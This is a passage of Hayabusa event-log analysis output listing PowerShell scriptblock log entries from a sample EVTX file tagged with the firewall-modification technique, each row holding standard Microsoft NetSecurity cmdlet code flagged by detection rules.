($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${D",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"isplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDi",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"isplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDi",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"splayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 